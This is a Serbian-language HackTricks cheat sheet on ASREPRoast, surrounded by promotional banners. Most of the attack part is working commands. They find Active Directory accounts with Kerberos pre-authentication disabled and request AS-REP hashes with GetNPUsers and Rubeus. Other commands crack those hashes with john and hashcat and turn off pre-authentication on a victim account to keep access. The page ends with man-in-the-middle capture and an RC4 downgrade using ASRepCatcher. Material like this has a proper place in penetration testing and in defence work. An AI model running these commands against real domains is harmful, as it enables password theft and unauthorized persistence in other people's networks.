ASREPRoast

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Pridružite se HackenProof Discord serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!

Hakerski Uvidi Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

Vesti o Hakovanju u Realnom Vremenu Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu

Najnovije Najave Budite informisani o najnovijim nagradama za pronalaženje bagova i bitnim ažuriranjima platformi

Pridružite nam se na Discord-u i počnite da sarađujete sa vrhunskim hakerima danas!

ASREPRoast

ASREPRoast je sigurnosni napad koji iskorišćava korisnike koji nemaju Kerberos pre-authentication required atribut. Essencijalno, ova ranjivost omogućava napadačima da zatraže autentikaciju za korisnika od Domain Controller-a (DC) bez potrebe za korisnikovom lozinkom. DC zatim odgovara porukom enkriptovanom korisnikovim ključem izvedenim iz lozinke, koju napadači mogu pokušati da dešifruju offline kako bi otkrili korisnikovu lozinku.

Glavni zahtevi za ovaj napad su:

  • Odsustvo Kerberos pre-authentication-a: Ciljni korisnici moraju imati ovu sigurnosnu funkciju onemogućenu.

  • Povezanost sa Domain Controller-om (DC): Napadači moraju imati pristup DC-u kako bi slali zahteve i primili enkriptovane poruke.

  • Opcioni domenski nalog: Imajući domenski nalog omogućava napadačima efikasnije identifikovanje ranjivih korisnika putem LDAP upita. Bez takvog naloga, napadači moraju da nagađaju korisnička imena.

Enumeracija ranjivih korisnika (potrebne domenske akreditacije)

Korišćenje Windows-a
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Korišćenje Linux-a
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

Zahtevaj AS_REP poruku

Korišćenje Linux-a
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Korišćenje Windows-a
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

AS-REP Roasting sa Rubeusom će generisati 4768 sa vrstom šifrovanja 0x17 i vrstom preautentikacije 0.

Krekovanje

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Upornost

Prisilite preauth da nije potreban za korisnika za koga imate dozvole GenericAll (ili dozvole za pisanje svojstava):

Korišćenje Windows-a
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Korišćenje Linux-a

```bash bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH ``` ## ASREProast bez pristupnih podataka

Napadač može koristiti poziciju čoveka u sredini da uhvati AS-REP pakete dok prolaze kroz mrežu, ne oslanjajući se na isključenu Kerberos preautentikaciju. Stoga ova tehnika funkcioniše za sve korisnike na VLAN-u. ASRepCatcher nam omogućava da to uradimo. Osim toga, ovaj alat prisiljava klijentske radne stanice da koriste RC4 izmenom pregovora Kerberosa.

# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disabling ARP spoofing, the mitm position must be obtained differently
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen

Reference


Pridružite se HackenProof Discord serveru kako biste komunicirali sa iskusnim hakerima i lovcima na bagove!

Hakerski uvidi Uključite se u sadržaj koji istražuje uzbuđenje i izazove hakovanja

Vesti o hakovanju u realnom vremenu Budite u toku sa brzim svetom hakovanja kroz vesti i uvide u realnom vremenu

Poslednje najave Budite informisani o najnovijim nagradama za pronalaženje bagova i važnim ažuriranjima platforme

Pridružite nam se na Discord-u i počnite da sarađujete sa vrhunskim hakerima danas!

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated